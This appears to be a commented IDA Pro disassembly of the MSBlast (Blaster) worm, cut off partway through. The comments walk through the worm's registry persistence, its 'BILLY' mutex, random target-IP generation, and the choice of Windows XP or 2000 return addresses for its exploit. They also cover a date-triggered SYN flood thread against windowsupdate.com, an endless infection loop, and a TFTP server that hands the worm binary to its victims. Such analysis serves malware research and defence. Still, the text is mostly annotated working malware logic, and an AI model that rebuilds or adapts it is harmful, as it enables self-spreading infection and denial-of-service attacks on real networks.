Commented disassembly, c. 2003-2004
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2003 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code
.text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and
.text:00401000 ; is therefore not commented.
.text:00401000 ;
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : msblast.exe.unpacked
.text:00401000 ; Format : Portable executable for IBM PC (PE)
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001458 ( 5208.)
.text:00401000 ; Section size in file : 00001458 ( 5208.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : 16 bytes ?
.text:00401000
.text:00401000
.text:00401000 unicode macro page,string,zero
.text:00401000 irpc c,<string>
.text:00401000 db '&c', page
.text:00401000 endm
.text:00401000 ifnb <zero>
.text:00401000 dw zero
.text:00401000 endif
.text:00401000 endm
.text:00401000
.text:00401000 model flat
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo
.text:00401000 xor eax, eax
.text:00401002 inc eax
.text:00401003 mov ecx, [esp+4]
.text:00401007 test dword ptr [ecx+4], 6
.text:0040100E jz short locret_40101F
.text:00401010 mov eax, [esp+8]
.text:00401014 mov edx, [esp+10h]
.text:00401018 mov [edx], eax
.text:0040101A mov eax, 3
.text:0040101F
.text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j
.text:0040101F retn
.text:00401020
.text:00401020 ; =============== S U B R O U T I N E =======================================
.text:00401020
.text:00401020
.text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp
.text:00401020 ; .text:00401138vp
.text:00401020
.text:00401020 var_8 = dword ptr -8
.text:00401020 arg_0 = dword ptr 10h
.text:00401020 arg_4 = dword ptr 14h
.text:00401020
.text:00401020 push ebx
.text:00401021 push esi
.text:00401022 push edi
.text:00401023 mov eax, [esp+arg_0]
.text:00401027 push eax
.text:00401028 push 0FFFFFFFEh
.text:0040102A push offset loc_401000
.text:0040102F push large dword ptr fs:0
.text:00401036 mov large fs:0, esp
.text:0040103D
.text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj
.text:0040103D ; sub_401020+4Avj
.text:0040103D mov eax, [esp+10h+arg_0]
.text:00401041 mov ebx, [eax+8]
.text:00401044 mov esi, [eax+0Ch]
.text:00401047 cmp esi, 0FFFFFFFFh
.text:0040104A jz short loc_40106C
.text:0040104C cmp esi, [esp+10h+arg_4]
.text:00401050 jz short loc_40106C
.text:00401052 lea esi, [esi+esi*2]
.text:00401055 mov ecx, [ebx+esi*4]
.text:00401058 mov ecx, [esp+10h+var_8]
.text:0040105C mov ecx, [eax+0Ch]
.text:0040105F cmp dword ptr [ebx+esi*4+4], 0
.text:00401064 jnz short loc_40103D
.text:00401066 call dword ptr [ebx+esi*4+8]
.text:0040106A jmp short loc_40103D
.text:0040106C ; ---------------------------------------------------------------------------
.text:0040106C
.text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j
.text:0040106C ; sub_401020+30^j
.text:0040106C pop large dword ptr fs:0
.text:00401073 add esp, 0Ch
.text:00401076 pop edi
.text:00401077 pop esi
.text:00401078 pop ebx
.text:00401079 retn
.text:00401079 sub_401020 endp
.text:00401079
.text:0040107A
.text:0040107A ; =============== S U B R O U T I N E =======================================
.text:0040107A
.text:0040107A ; Attributes: bp-based frame
.text:0040107A
.text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp
.text:0040107A
.text:0040107A arg_0 = dword ptr 8
.text:0040107A
.text:0040107A push ebp
.text:0040107B mov ebp, esp
.text:0040107D push ebx
.text:0040107E push esi
.text:0040107F push edi
.text:00401080 push ebp
.text:00401081 push 0
.text:00401083 push 0
.text:00401085 push offset loc_401092
.text:0040108A push [ebp+arg_0]
.text:0040108D call RtlUnwind
.text:00401092
.text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o
.text:00401092 pop ebp
.text:00401093 pop edi
.text:00401094 pop esi
.text:00401095 pop ebx
.text:00401096 mov esp, ebp
.text:00401098 pop ebp
.text:00401099 retn
.text:00401099 sub_40107A endp
.text:00401099
.text:0040109A ; ---------------------------------------------------------------------------
.text:0040109A
.text:0040109A loc_40109A: ; DATA XREF: start+10vo
.text:0040109A cld
.text:0040109B push ebp
.text:0040109C mov ebp, esp
.text:0040109E sub esp, 8
.text:004010A1 push ebx
.text:004010A2 push esi
.text:004010A3 push edi
.text:004010A4 push ebp
.text:004010A5 mov ebx, [ebp+0Ch]
.text:004010A8 mov eax, [ebp+8]
.text:004010AB mov dword_404030, eax
.text:004010B0 mov dword_404034, ebx
.text:004010B6 test dword ptr [eax+4], 6
.text:004010BD jnz short loc_401131
.text:004010BF mov [ebp-8], eax
.text:004010C2 mov eax, [ebp+10h]
.text:004010C5 mov [ebp-4], eax
.text:004010C8 mov dword_404034, eax
.text:004010CD lea eax, [ebp-8]
.text:004010D0 mov [ebx-4], eax
.text:004010D3 mov esi, [ebx+0Ch]
.text:004010D6 mov edi, [ebx+8]
.text:004010D9
.text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj
.text:004010D9 cmp esi, 0FFFFFFFFh
.text:004010DC jz short loc_401140
.text:004010DE lea ecx, [esi+esi*2]
.text:004010E1 cmp dword ptr [edi+ecx*4+4], 0
.text:004010E6 jz short loc_401122
.text:004010E8 push esi
.text:004010E9 push ebp
.text:004010EA lea ebp, [ebx+10h]
.text:004010ED call dword ptr [edi+ecx*4+4]
.text:004010F1 pop ebp
.text:004010F2 pop esi
.text:004010F3 mov ebx, [ebp+0Ch]
.text:004010F6 or eax, eax
.text:004010F8 jz short loc_401122
.text:004010FA js short loc_40112D
.text:004010FC mov edi, [ebx+8]
.text:004010FF push ebx
.text:00401100 call sub_40107A
.text:00401105 add esp, 4
.text:00401108 lea ebp, [ebx+10h]
.text:0040110B push esi
.text:0040110C push ebx
.text:0040110D call sub_401020
.text:00401112 add esp, 8
.text:00401115 lea ecx, [esi+esi*2]
.text:00401118 mov eax, [edi+ecx*4]
.text:0040111B mov eax, [ebx+0Ch]
.text:0040111E call dword ptr [edi+ecx*4+8]
.text:00401122
.text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j
.text:00401122 ; .text:004010F8^j
.text:00401122 mov edi, [ebx+8]
.text:00401125 lea ecx, [esi+esi*2]
.text:00401128 mov esi, [edi+ecx*4]
.text:0040112B jmp short loc_4010D9
.text:0040112D ; ---------------------------------------------------------------------------
.text:0040112D
.text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j
.text:0040112D xor eax, eax
.text:0040112F jmp short loc_4011A2
.text:00401131 ; ---------------------------------------------------------------------------
.text:00401131
.text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j
.text:00401131 push ebp
.text:00401132 lea ebp, [ebx+10h]
.text:00401135 push 0FFFFFFFFh
.text:00401137 push ebx
.text:00401138 call sub_401020
.text:0040113D add esp, 0Ch
.text:00401140
.text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j
.text:00401140 push 0
.text:00401142 mov dword_404010, 0Bh
.text:0040114C push 0Bh
.text:0040114E call signal
.text:00401153 add esp, 8
.text:00401156 or eax, eax
.text:00401158 jnz short loc_40117B
.text:0040115A push 0
.text:0040115C mov dword_404010, 8
.text:00401166 push 8
.text:00401168 call signal
.text:0040116D add esp, 8
.text:00401170 or eax, eax
.text:00401172 jnz short loc_40117B
.text:00401174 mov eax, 1
.text:00401179 jmp short loc_4011A2
.text:0040117B ; ---------------------------------------------------------------------------
.text:0040117B
.text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j
.text:0040117B ; .text:00401172^j
.text:0040117B cmp eax, 0FFFFFFFFh
.text:0040117E jz short loc_4011AA
.text:00401180 push eax
.text:00401181 push dword_404010
.text:00401187 call signal
.text:0040118C add esp, 8
.text:0040118F push dword_404010
.text:00401195 call raise
.text:0040119A add esp, 4
.text:0040119D mov eax, 1
.text:004011A2
.text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j
.text:004011A2 ; .text:00401179^j ...
.text:004011A2 pop ebp
.text:004011A3 pop edi
.text:004011A4 pop esi
.text:004011A5 pop ebx
.text:004011A6 mov esp, ebp
.text:004011A8 pop ebp
.text:004011A9 retn
.text:004011AA ; ---------------------------------------------------------------------------
.text:004011AA
.text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j
.text:004011AA cmp dword_40402C, 0
.text:004011B1 jnz short loc_4011BA
.text:004011B3 mov eax, 1
.text:004011B8 jmp short loc_4011A2
.text:004011BA ; ---------------------------------------------------------------------------
.text:004011BA
.text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j
.text:004011BA mov eax, dword_40402C
.text:004011BF push 0Bh
.text:004011C1 jmp eax
.text:004011C3 ; ---------------------------------------------------------------------------
.text:004011C3 pop eax
.text:004011C4 mov eax, 1
.text:004011C9 jmp short loc_4011A2
.text:004011CB
.text:004011CB ; =============== S U B R O U T I N E =======================================
.text:004011CB
.text:004011CB ; Attributes: bp-based frame
.text:004011CB
.text:004011CB public start
.text:004011CB start proc near
.text:004011CB
.text:004011CB var_30 = word ptr -30h
.text:004011CB var_18 = dword ptr -18h
.text:004011CB var_4 = dword ptr -4
.text:004011CB
.text:004011CB mov eax, large fs:0
.text:004011D1 push ebp
.text:004011D2 mov ebp, esp
.text:004011D4 push 0FFFFFFFFh
.text:004011D6 push offset unk_40401C
.text:004011DB push offset loc_40109A
.text:004011E0 push eax
.text:004011E1 mov large fs:0, esp
.text:004011E8 sub esp, 10h
.text:004011EB push ebx
.text:004011EC push esi
.text:004011ED push edi
.text:004011EE mov [ebp+var_18], esp
.text:004011F1 push eax
.text:004011F2 fnstcw [esp+30h+var_30]
.text:004011F5 or word ptr [esp], 300h
.text:004011FB fldcw [esp+30h+var_30]
.text:004011FE add esp, 4
.text:00401201 push 0
.text:00401203 push 0
.text:00401205 push offset dword_404028
.text:0040120A push offset dword_404024
.text:0040120F push offset dword_404020
.text:00401214 call __GetMainArgs
.text:00401219 push dword_404028
.text:0040121F push dword_404024
.text:00401225 push dword_404020
.text:0040122B mov dword_404014, esp
.text:00401231 call sub_402254
.text:00401236 add esp, 18h
.text:00401239 xor ecx, ecx
.text:0040123B mov [ebp+var_4], ecx
.text:0040123E push eax
.text:0040123F call exit
.text:00401244 leave
.text:00401245 retn
.text:00401245 start endp
.text:00401245
.text:00401245 ; ---------------------------------------------------------------------------
.text:00401246 align 4
.text:00401248 mov large fs:0, eax
.text:0040124E retn
.text:0040124E ; ---------------------------------------------------------------------------
.text:0040124F align 4
.text:00401250
.text:00401250 ; =============== S U B R O U T I N E =======================================
.text:00401250
.text:00401250 ; Attributes: bp-based frame
.text:00401250
.text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp
.text:00401250
.text:00401250 in = in_addr ptr -3ACh
.text:00401250 var_3A8 = dword ptr -3A8h
.text:00401250 var_3A4 = dword ptr -3A4h
.text:00401250 name = byte ptr -3A0h
.text:00401250 WSAData = WSAData ptr -1A0h
.text:00401250 szMonth = byte ptr -10h
.text:00401250 szDay = byte ptr -0Ch
.text:00401250 hKey = dword ptr -8
.text:00401250 ThreadId = dword ptr -4
.text:00401250
.text:00401250 push ebp
.text:00401251 mov ebp, esp
.text:00401253 sub esp, 3ACh
.text:00401259 push esi
.text:0040125A push edi
.text:0040125B xor esi, esi
.text:0040125D
.text:0040125D Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run
.text:0040125D
.text:0040125D push 0 ; lpdwDisposition
.text:0040125F lea eax, [ebp+hKey]
.text:00401262 push eax ; phkResult
.text:00401263 push 0 ; lpSecurityAttributes
.text:00401265 push 0F003Fh ; samDesired
.text:0040126A push 0 ; dwOptions
.text:0040126C push 0 ; lpClass
.text:0040126E push 0 ; Reserved
.text:00401270 push offset aSoftwareMicros ; lpSubKey
.text:00401275 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
.text:0040127A call RegCreateKeyExA
.text:0040127F
.text:0040127F Create "windows auto update" string value = "msblast.exe"
.text:0040127F
.text:0040127F push 32h ; cbData (some extra here after null term)
.text:00401281 push offset aMsblast_exe ; lpData
.text:00401286 push 1 ; dwType = REG_SZ
.text:00401288 push 0 ; Reserved
.text:0040128A push offset aWindowsAutoUpd ; lpValueName
.text:0040128F push [ebp+hKey] ; hKey
.text:00401292 call RegSetValueExA
.text:00401297 push [ebp+hKey] ; hKey
.text:0040129A call RegCloseKey
.text:0040129F
.text:0040129F Create "BILLY" named mutex to prevent multiple infection
.text:0040129F
.text:0040129F push offset aBilly ; lpName
.text:004012A4 push 1 ; bInitialOwner
.text:004012A6 push 0 ; lpMutexAttributes
.text:004012A8 call CreateMutexA
.text:004012AD call GetLastError
.text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists
.text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here
.text:004012B9 push 0 ; uExitCode
.text:004012BB call ExitProcess
.text:004012C0
.text:004012C0 Initialize Winsock
.text:004012C0
.text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j
.text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... continue here
.text:004012C6 push eax ; lpWSAData
.text:004012C7 push 202h ; wVersionRequested (2.2)
.text:004012CC call WSAStartup
.text:004012D1 or eax, eax
.text:004012D3 jz short loc_401304
.text:004012D5 lea eax, [ebp+WSAData]
.text:004012DB push eax ; lpWSAData
.text:004012DC push 101h ; wVersionRequested (1.1)
.text:004012E1 call WSAStartup
.text:004012E6 or eax, eax
.text:004012E8 jz short loc_401304
.text:004012EA lea eax, [ebp+WSAData]
.text:004012F0 push eax ; lpWSAData
.text:004012F1 push 1 ; wVersionRequested (1.0)
.text:004012F3 call WSAStartup
.text:004012F8 or eax, eax
.text:004012FA jz short loc_401304
.text:004012FC or eax, 0FFFFFFFFh
.text:004012FF jmp loc_401570 ; return
.text:00401304 ; ---------------------------------------------------------------------------
.text:00401304
.text:00401304 loc_401304: ; CODE XREF: WinMain+83^j
.text:00401304 ; WinMain+98^j ...
.text:00401304 push 104h ; nSize
.text:00401309 push offset Filename ; lpFilename
.text:0040130E push 0 ; hModule
.text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later)
.text:00401315
.text:00401315 Wait until host is connected to Internet
.text:00401315
.text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj
.text:00401315 push 0 ; sleep 20 second intervals until connected to Internet
.text:00401317 lea eax, [ebp+ThreadId]
.text:0040131A push eax
.text:0040131B call InternetGetConnectedState
.text:00401320 or eax, eax
.text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0)
.text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds)
.text:00401329 call Sleep
.text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet
.text:00401330 ; ---------------------------------------------------------------------------
.text:00401330
.text:00401330 Get IP address and selectively apply randomization
.text:00401330
.text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j
.text:00401330 and ds:octet4, 0 ; start at beginning of subnet (x.x.x.0)
.text:00401337 call GetTickCount
.text:0040133C push eax
.text:0040133D call srand ; seed random number generator with GetTickCount()
.text:00401342 pop ecx
.text:00401343 call rand
.text:00401348 mov ecx, 0FEh
.text:0040134D cdq
.text:0040134E idiv ecx
.text:00401350 mov edi, edx
.text:00401352 inc edi
.text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254
.text:00401353 ; make first and second octets of spoofed SYN
.text:00401353 ; source address random at first -- if we can't
.text:00401353 ; get our local IP, then leave these random;
.text:00401353 ; otherwise, replace them with our local IP's
.text:00401353 ; first and second octets
.text:00401359 call rand
.text:0040135E mov ecx, 0FEh
.text:00401363 cdq
.text:00401364 idiv ecx
.text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254
.text:0040136C push 200h ; namelen
.text:00401371 lea eax, [ebp+name]
.text:00401377 push eax ; name
.text:00401378 call gethostname ; get name of local machine for IP lookup
.text:0040137D cmp eax, 0FFFFFFFFh
.text:00401380 jz loc_401476 ; did gethostname() fail?
.text:00401386 lea eax, [ebp+name]
.text:0040138C push eax ; name
.text:0040138D call gethostbyname ; now that we have machine name, get local IP address
.text:00401392 mov [ebp+var_3A4], eax
.text:00401398 or eax, eax
.text:0040139A jz loc_401476 ; did gethostbyname() fail?
.text:004013A0 mov ecx, [eax+0Ch]
.text:004013A3 cmp dword ptr [ecx], 0
.text:004013A6 jz loc_401476 ; is *h_addr_list NULL? (couldn't get a local IP address)
.text:004013AC push 4 ; sizeof(struct in_addr) = 4
.text:004013AE mov eax, [eax+0Ch]
.text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source
.text:004013B3 lea eax, [ebp+in]
.text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr
.text:004013BA call memcpy
.text:004013BF push dword ptr [ebp+in.S_un] ; in
.text:004013C5 call inet_ntoa
.text:004013CA push eax
.text:004013CB push offset aS ; "%s"
.text:004013D0 lea edi, [ebp+name]
.text:004013D6 push edi
.text:004013D7 call sprintf
.text:004013DC push offset a_ ; "."
.text:004013E1 lea eax, [ebp+name]
.text:004013E7 push eax
.text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter)
.text:004013ED mov [ebp+var_3A8], eax
.text:004013F3 push eax
.text:004013F4 call atoi
.text:004013F9 mov ds:octet1, eax
.text:004013FE push offset a_ ; "."
.text:00401403 push 0
.text:00401405 call strtok ; get second octet
.text:0040140A mov [ebp+var_3A8], eax
.text:00401410 push eax
.text:00401411 call atoi
.text:00401416 mov ds:octet2, eax
.text:0040141B push offset a_ ; "."
.text:00401420 push 0
.text:00401422 call strtok ; get third octet
.text:00401427 mov [ebp+var_3A8], eax
.text:0040142D push eax
.text:0040142E call atoi
.text:00401433 add esp, 3Ch
.text:00401436 mov ds:octet3, eax
.text:0040143B cmp eax, 14h
.text:0040143E jle short loc_40145F ; third octet <= 20?
.text:00401440 call GetTickCount
.text:00401445 push eax
.text:00401446 call srand
.text:0040144B pop ecx
.text:0040144C call rand
.text:00401451 mov ecx, 14h
.text:00401456 cdq
.text:00401457 idiv ecx
.text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20)
.text:0040145F
.text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j
.text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for
.text:0040145F ; spoofed source address of SYN packets
.text:0040145F ; (this code will only be reached if we were
.text:0040145F ; able to get the local machine's IP address)
.text:00401464 mov ds:synspoofoctet1, eax
.text:00401469 mov eax, ds:octet2
.text:0040146E mov ds:synspoofoctet2, eax
.text:00401473 xor esi, esi
.text:00401475 inc esi ; ESI = 1
.text:00401476
.text:00401476 loc_401476: ; CODE XREF: WinMain+130^j
.text:00401476 ; WinMain+14A^j ...
.text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP
.text:00401476 ; (note that ESI=0 if we jumped here after failing
.text:00401476 ; to get our local IP, meaning that, in that case,
.text:00401476 ; we'll always randomize the initial target IP)
.text:0040147B push eax
.text:0040147C call srand
.text:00401481 pop ecx
.text:00401482 call rand
.text:00401487 mov ecx, 14h
.text:0040148C cdq
.text:0040148D idiv ecx
.text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19
.text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance
.text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance
.text:00401496
.text:00401496 Randomly decide which return address to use in the exploit
.text:00401496 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh)
.text:00401496 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh)
.text:00401496
.text:00401496 loc_401496: ; CODE XREF: WinMain+242^j
.text:00401496 mov ds:dwWhichRetAddr, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 0Ah
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7 ; EDX = rand() % 10
.text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr)
.text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr)
.text:004014BC
.text:004014BC 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized:
.text:004014BC 1st: 1..254
.text:004014BC 2nd: 0..253
.text:004014BC 3rd: 0..253
.text:004014BC
.text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j
.text:004014BC or esi, esi
.text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets
.text:004014C0 call rand
.text:004014C5 mov ecx, 0FEh
.text:004014CA cdq
.text:004014CB idiv ecx
.text:004014CD mov edi, edx
.text:004014CF inc edi
.text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1
.text:004014D6 call rand
.text:004014DB mov ecx, 0FEh
.text:004014E0 cdq
.text:004014E1 idiv ecx
.text:004014E3 mov ds:octet2, edx ; rand() % 254
.text:004014E9 call rand
.text:004014EE mov ecx, 0FEh
.text:004014F3 cdq
.text:004014F4 idiv ecx
.text:004014F6 mov ds:octet3, edx ; rand() % 254
.text:004014FC
.text:004014FC Check date to decide whether or not to SYN flood windowsupdate.com
.text:004014FC
.text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j
.text:004014FC push 3 ; cchDate
.text:004014FE lea eax, [ebp+szDay]
.text:00401501 push eax ; lpDateStr
.text:00401502 push offset aD ; lpFormat = "d"
.text:00401507 push 0 ; lpDate
.text:00401509 push 0 ; dwFlags
.text:0040150B push 409h ; Locale
.text:00401510 call GetDateFormatA
.text:00401515 push 3 ; cchDate
.text:00401517 lea eax, [ebp+szMonth]
.text:0040151A push eax ; lpDateStr
.text:0040151B push offset aM ; lpFormat = "M"
.text:00401520 push 0 ; lpDate
.text:00401522 push 0 ; dwFlags
.text:00401524 push 409h ; Locale
.text:00401529 call GetDateFormatA
.text:0040152E lea eax, [ebp+szDay]
.text:00401531 push eax
.text:00401532 call atoi
.text:00401537 pop ecx
.text:00401538 cmp eax, 0Fh ; if day is after 15th...
.text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80
.text:0040153D lea edi, [ebp+szMonth]
.text:00401540 push edi
.text:00401541 call atoi
.text:00401546 pop ecx
.text:00401547 cmp eax, 8 ; ...or month is after August (8)...
.text:0040154A jle short loc_401562 ; infinitely call infection loop function
.text:0040154C
.text:0040154C If day is > 15 or month > 8 (August), create SYN flood thread
.text:0040154C
.text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j
.text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80
.text:0040154F push eax ; lpThreadId
.text:00401550 push 0 ; dwCreationFlags
.text:00401552 push 0 ; lpParameter
.text:00401554 push offset WUSYNFloodThread ; lpStartAddress
.text:00401559 push 0 ; dwStackSize
.text:0040155B push 0 ; lpThreadAttributes
.text:0040155D call CreateThread
.text:00401562
.text:00401562 Infect sequential IP addresses endlessly, 20 hosts at a time
.text:00401562
.text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j
.text:00401562 ; WinMain+317vj
.text:00401562 call infect20Hosts ; infinitely call infection loop function
.text:00401567 jmp short loc_401562 ; infinitely call infection loop function
.text:00401569 ; ---------------------------------------------------------------------------
.text:00401569 call WSACleanup
.text:0040156E xor eax, eax
.text:00401570
.text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j
.text:00401570 pop edi ; return
.text:00401571 pop esi
.text:00401572 leave
.text:00401573 retn 10h
.text:00401573 WinMain endp
.text:00401573
.text:00401576
.text:00401576 ; =============== S U B R O U T I N E =======================================
.text:00401576
.text:00401576 ; Attributes: bp-based frame
.text:00401576
.text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo
.text:00401576
.text:00401576 buf = byte ptr -42Ch
.text:00401576 name = sockaddr ptr -228h
.text:00401576 to = sockaddr ptr -218h
.text:00401576 tolen = dword ptr -208h
.text:00401576 var_204 = word ptr -204h
.text:00401576 var_202 = word ptr -202h
.text:00401576 var_200 = byte ptr -200h
.text:00401576
.text:00401576 push ebp
.text:00401577 mov ebp, esp
.text:00401579 sub esp, 42Ch
.text:0040157F push ebx
.text:00401580 push esi
.text:00401581 push edi
.text:00401582 mov dwTFTPInProgress, 1
.text:0040158C
.text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj
.text:0040158C push 0 ; protocol = IPPROTO_IP
.text:0040158E push 2 ; type = SOCK_DGRAM
.text:00401590 push 2 ; af = AF_INET
.text:00401592 call socket
.text:00401597 mov ds:s, eax
.text:0040159C cmp eax, 0FFFFFFFFh
.text:0040159F jz loc_4016EA
.text:004015A5 push 10h
.text:004015A7 push 0
.text:004015A9 lea eax, [ebp+name]
.text:004015AF push eax
.text:004015B0 call memset
.text:004015B5 add esp, 0Ch
.text:004015B8 mov [ebp+name.sa_family], 2
.text:004015C1 push 45h ; hostshort = 69 (TFTP)
.text:004015C3 call htons
.text:004015C8 mov edx, eax
.text:004015CA mov word ptr [ebp+name.sa_data], dx
.text:004015D1 and dword ptr [ebp+name.sa_data+2], 0
.text:004015D8 push 10h ; namelen
.text:004015DA lea eax, [ebp+name]
.text:004015E0 push eax ; name
.text:004015E1 push ds:s ; s
.text:004015E7 call bind
.text:004015EC or eax, eax
.text:004015EE jnz loc_4016EA
.text:004015F4 mov [ebp+tolen], 10h
.text:004015FE lea eax, [ebp+tolen]
.text:00401604 push eax ; fromlen
.text:00401605 lea eax, [ebp+to]
.text:0040160B push eax ; from
.text:0040160C push 0 ; flags
.text:0040160E push 204h ; len
.text:00401613 lea eax, [ebp+buf]
.text:00401619 push eax ; buf
.text:0040161A push ds:s ; s
.text:00401620 call recvfrom
.text:00401625 cmp eax, 1
.text:00401628 jl loc_4016EA
.text:0040162E xor ebx, ebx
.text:00401630 push offset aRb ; "rb"
.text:00401635 push offset Filename ; 260 (104h) = MAX_PATH
.text:0040163A call fopen
.text:0040163F add esp, 8
.text:00401642 mov esi, eax
.text:00401644 or eax, eax
.text:00401646 jz loc_4016EA
.text:0040164C
.text:0040164C loc_40164C: ; CODE XREF: TFTPServerThread+15Dvj
.text:0040164C inc ebx
.text:0040164D push 3 ; hostshort
.text:0040164F call htons
.text:00401654 mov edx, eax
.text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order)
.text:00401656 ; 0000 WORD = 3?
.text:00401656 ; 0002 WORD chunk number (starts at 1)
.text:00401656 ; 0004 start of data
.text:0040165D mov eax, ebx
.text:0040165F and eax, 0FFFFh
.text:00401664 push eax ; hostshort
.text:00401665 call htons
.text:0040166A mov edx, eax
.text:0040166C mov [ebp+var_202], dx
.text:00401673 push esi
.text:00401674 push 200h
.text:00401679 push 1
.text:0040167B lea eax, [ebp+var_200]
.text:00401681 push eax
.text:00401682 call fread
.text:00401687 add esp, 10h
.text:0040168A mov edi, eax ; length actually read
.text:0040168C add edi, 4 ; + 4 (for TFTP header)
.text:0040168F push [ebp+tolen] ; tolen
.text:00401695 lea eax, [ebp+to]
.text:0040169B push eax ; to
.text:0040169C push 0 ; flags
.text:0040169E push edi ; len
.text:0040169F lea eax, [ebp+var_204]
.text:004016A5 push eax ; buf
.text:004016A6 push ds:s ; s
.text:004016AC call sendto
.text:004016B1 cmp eax, 1
.text:004016B4 jl short loc_4016D8
.text:004016B6 push 384h ; dwMilliseconds
.text:004016BB call Sleep ; sleep for 0.9 seconds
.text:004016C0 cmp edi, 204h
.text:004016C6 jnb short loc_4016D3
.text:004016C8 push esi
.text:004016C9 call fclose
.text:004016CE pop ecx
.text:004016CF xor esi, esi
.text:004016D1 jmp short loc_4016D8
.text:004016D3 ; ---------------------------------------------------------------------------
.text:004016D3
.text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j
.text:004016D3 jmp loc_40164C
.text:004016D8 ; ---------------------------------------------------------------------------
.text:004016D8
.text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j
.text:004016D8 ; TFTPServerThread+15B^j
.text:004016D8 or esi, esi
.text:004016DA jz short loc_4016EA
.text:004016DC push esi
.text:004016DD call fclose
.text:004016E2 pop ecx
.text:004016E3 jmp short loc_4016EA
.text:004016E5 ; ---------------------------------------------------------------------------
.text:004016E5 jmp loc_40158C
.text:004016EA ; ---------------------------------------------------------------------------
.text:004016EA
.text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j
.text:004016EA ; TFTPServerThread+78^j ...
.text:004016EA and dwTFTPInProgress, 0
.text:004016F1 push ds:s ; s
.text:004016F7 call closesocket
.text:004016FC push 0 ; dwExitCode
.text:004016FE call ExitThread
.text:00401703 xor eax, eax
.text:00401705 pop edi
.text:00401706 pop esi
.text:00401707 pop ebx
.text:00401708 leave
.text:00401709 retn 4
.text:00401709 TFTPServerThread endp
.text:00401709
.text:0040170C
.text:0040170C ; =============== S U B R O U T I N E =======================================
.text:0040170C
.text:0040170C
.text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj
.text:0040170C ; infect20Hosts+6Fvp
